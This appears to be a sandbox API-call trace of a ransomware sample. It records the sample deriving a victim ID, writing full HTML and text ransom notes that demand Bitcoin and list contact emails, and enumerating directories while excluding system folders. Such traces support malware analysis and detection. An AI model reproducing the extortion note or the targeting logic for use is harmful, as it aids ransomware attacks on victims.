	[0174.239] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.239] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.239] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0174.241] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.241] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.241] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.242] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.242] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0174.242] CloseHandle (hObject=0x390) returned 1
	[0174.242] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.243] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.243] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.243] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0174.243] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.248] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.248] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0174.255] CloseHandle (hObject=0x390) returned 1
	[0174.256] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.256] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.257] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0174.258] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.258] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0174.258] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.259] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.259] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0174.259] CloseHandle (hObject=0x390) returned 1
	[0174.259] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x81604bf8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8162b011, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0174.260] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*") returned 89
	[0174.260] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.260] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*") returned 0x59
	[0174.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.260] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0174.260] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0174.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0174.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.261] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0174.261] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.262] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0174.262] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.262] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.262] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.262] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0174.262] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.262] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0174.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.263] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0174.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.263] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0174.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.263] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0174.263] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.264] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.264] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0174.264] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.265] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0174.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.265] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0174.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.265] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0174.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.265] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0174.265] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.266] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0174.266] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0174.266] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.266] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x81604bf8, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8162b011, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0174.266] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.266] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8162b011, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8162b011, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x816510ac, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.266] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8162b011, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8162b011, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8162b011, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.266] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0174.267] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0174.267] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0174.267] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov"
	[0174.267] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\"
	[0174.267] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime"
	[0174.267] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime"
	[0174.267] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\"
	[0174.267] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\"
	[0174.268] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*"
	[0174.268] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb91b0
	[0174.268] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*") returned 97
	[0174.268] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.268] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*") returned 0x61
	[0174.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.268] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0174.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.269] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0174.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.269] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0174.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.269] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.270] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0174.270] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.270] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0174.270] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.270] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.270] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.270] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0174.270] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.271] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0174.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.271] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0174.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.271] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0174.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.271] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0174.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0174.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0174.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.272] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0174.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0174.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0174.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.273] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0174.273] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="..", cAlternateFileName="")) returned 1
	[0174.273] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12d8e21, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12d8e21, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa12ff08c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71a, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0174.274] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0174.274] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
